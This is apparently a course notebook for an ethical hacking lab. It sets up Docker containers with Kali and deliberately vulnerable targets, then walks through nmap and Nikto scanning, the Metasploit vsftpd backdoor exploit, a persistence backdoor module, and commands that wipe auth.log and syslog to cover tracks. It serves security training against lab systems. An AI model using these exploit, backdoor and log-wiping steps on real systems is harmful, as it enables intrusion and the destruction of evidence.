<a href="https://colab.research.google.com/github/blacktalenthubs/Dynamic-Application-Security-Testing/blob/main/week2_lab_security_engineering.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### Detailed Lab Setup for Ethical Hacking with Command Descriptions for week 2

#### 1. Prerequisites

- Ensure Docker is installed on your machine. You can download Docker from [Docker's official website](https://www.docker.com/products/docker-desktop).
- Basic understanding of Docker commands and container management.

---

#### 2. Setting Up the Environment

**2.1. Create a Docker Network:**
Create a custom Docker network to allow communication between containers.
```bash
docker network create ethical-hacking-lab
```
*Why?* This creates an isolated network for our lab environment, allowing containers to communicate securely.

---

#### 3. Setting Up the Kali Linux Container

**3.1. Pull the Kali Linux Docker Image:**
```bash
docker pull kalilinux/kali-rolling
```
*Why?* This pulls the latest Kali Linux image, a popular Linux distribution used for penetration testing.

**3.2. Run the Kali Linux Container:**
```bash
docker run -d --name kali --network ethical-hacking-lab --privileged -it kalilinux/kali-rolling /bin/bash
```
*Why?* This runs the Kali Linux container in detached mode, naming it "kali," and attaching it to our lab network. The `--privileged` flag allows full access to the host system.

**3.3. Install Necessary Tools in the Kali Container:**
```bash
docker exec -it kali /bin/bash
apt update && apt install -y nmap recon-ng nikto metasploit-framework
```
*Why?* This updates package lists and installs essential penetration testing tools: Nmap, Recon-ng, Nikto, and Metasploit.

---

#### 4. Setting Up Vulnerable Hosts

**4.1. Metasploitable2:**

*Pull and Run Metasploitable2 Container:*
```bash
docker pull tleemcjr/metasploitable2
docker run -d --name metasploitable2 --network ethical-hacking-lab tleemcjr/metasploitable2
```
*Why?* Metasploitable2 is a deliberately vulnerable Linux machine, useful for practicing exploitation techniques.

**4.2. Juice Shop:**

*Pull and Run OWASP Juice Shop Container:*
```bash
docker pull bkimminich/juice-shop
docker run -d --name juiceshop --network ethical-hacking-lab -p 3000:3000 bkimminich/juice-shop
```
*Why?* Juice Shop is a vulnerable web application, ideal for testing web vulnerabilities.

**4.3. WebGoat:**

*Pull and Run WebGoat Container:*
```bash
docker pull webgoat/webgoat-8.0
docker run -d --name webgoat --network ethical-hacking-lab -p 8080:8080 webgoat/webgoat-8.0
```
*Why?* WebGoat is another intentionally vulnerable web application for learning about security flaws.

---

#### 5. Lab Exercises for Ethical Hacking Phases

**5.1. Reconnaissance:**

*Use Case 1: Network Discovery with Nmap*
- **Command:**
```bash
docker exec -it kali nmap -sP 172.18.0.0/16
```
*Why?* This command performs a ping scan (`-sP`) on the network to discover live hosts. It's the first step in identifying potential targets.

*Use Case 2: Service and Version Detection with Nmap*
- **Command:**
```bash
docker exec -it kali nmap -sV <target-ip>
```
- **Example:**
```bash
docker exec -it kali nmap -sV 172.18.0.2
```
*Why?* This command performs a version scan (`-sV`) to identify the services running on the target IP and their versions, helping to identify vulnerabilities.

*Use Case 3: Web Reconnaissance with Recon-ng*
- **Steps:**
  - Launch Recon-ng:
```bash
docker exec -it kali recon-ng
```
*Why?* This starts Recon-ng, a powerful web reconnaissance tool.
  - Add workspace:
```bash
workspaces add example
```
*Why?* This creates a workspace to organize and manage the reconnaissance data.
  - Set target domain:
```bash
set domain example.com
```
*Why?* This sets the target domain for reconnaissance.
  - Run recon modules:
```bash
marketplace install recon/domains-hosts/bing_domain_web
use recon/domains-hosts/bing_domain_web
run
```
*Why?* This installs and runs a specific recon module to gather information about subdomains and hosts related to the target domain.

**5.2. Scanning:**

*Use Case 1: Vulnerability Scanning with Nikto*
- **Command:**
```bash
docker exec -it kali nikto -h http://<target-ip>:<port>
```
- **Example:**
```bash
docker exec -it kali nikto -h http://172.18.0.3:3000
```
*Why?* This command runs Nikto, a web server scanner, to identify potential vulnerabilities and misconfigurations.

*Use Case 2: Vulnerability Scanning with Nmap Scripts*
- **Command:**
```bash
docker exec -it kali nmap -sV --script=vuln <target-ip>
```
- **Example:**
```bash
docker exec -it kali nmap -sV --script=vuln 172.18.0.2
```
*Why?* This uses Nmap's scripting engine to run vulnerability detection scripts, providing a more detailed assessment.

**5.3. Gaining Access:**

*Use Case 1: Exploiting a Vulnerability with Metasploit*
- **Steps:**
  - Launch Metasploit:
```bash
docker exec -it kali msfconsole
```
*Why?* This starts the Metasploit Framework, a powerful tool for exploiting vulnerabilities.
  - Search for an exploit:
```bash
search vsftpd
```
*Why?* This searches for exploits related to the vsftpd vulnerability.
  - Use the exploit:
```bash
use exploit/unix/ftp/vsftpd_234_backdoor
```
*Why?* This loads the vsftpd backdoor exploit.
  - Set target IP:
```bash
set RHOST <target-ip>
```
*Why?* This sets the target IP address for the exploit.
  - Run the exploit:
```bash
run
```
*Why?* This executes the exploit against the target, attempting to gain access.

**5.4. Maintaining Access:**

*Use Case 1: Creating a Persistent Backdoor*
- **Steps:**
  - Create a persistent backdoor using Metasploit:
```bash
use post/linux/manage/persistence
set SESSION <session-id>
run
```
*Why?* This post-exploitation module creates a persistent backdoor to maintain access to the compromised system.

**5.5. Covering Tracks:**

*Use Case 1: Clearing Logs*
- **Steps:**
  - Clear logs on the compromised system:
```bash
echo '' > /var/log/auth.log
echo '' > /var/log/syslog
```
*Why?* This command clears the logs, removing evidence of the attack and helping to avoid detection.

---

#### 6. Documentation and Reporting

**6.1. Document Findings:**
- Create detailed reports including:
  - **Scanned IP addresses:** List of discovered IPs.
  - **Open ports and services:** Identified open ports and running services.
  - **Identified vulnerabilities:** Detailed description of vulnerabilities.
  - **Screenshots:** Visual proof of findings.
  - **Suggested mitigations:** Recommended actions to fix vulnerabilities.

**6.2. Tools for Documentation:**
- **Dradis:** Collaborative tool for information sharing.
- **Markdown files:** Simple text documentation.
- **PDF reports:** Formal reporting format.

---

### Resources for Students

- **Kali Linux Documentation:** [Kali Linux Docs](https://www.kali.org/docs/)
- **Nmap Documentation:** [Nmap Reference Guide](https://nmap.org/book/man.html)
- **Recon-ng Documentation:** [Recon-ng GitHub](https://github.com/lanmaster53/recon-ng)
- **Nikto User Guide:** [Nikto User Guide](https://cirt.net/Nikto2)
- **Metasploit Documentation:** [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)

This setup provides a comprehensive lab environment for practicing all phases of ethical hacking, ensuring students gain hands-on experience with various tools and techniques.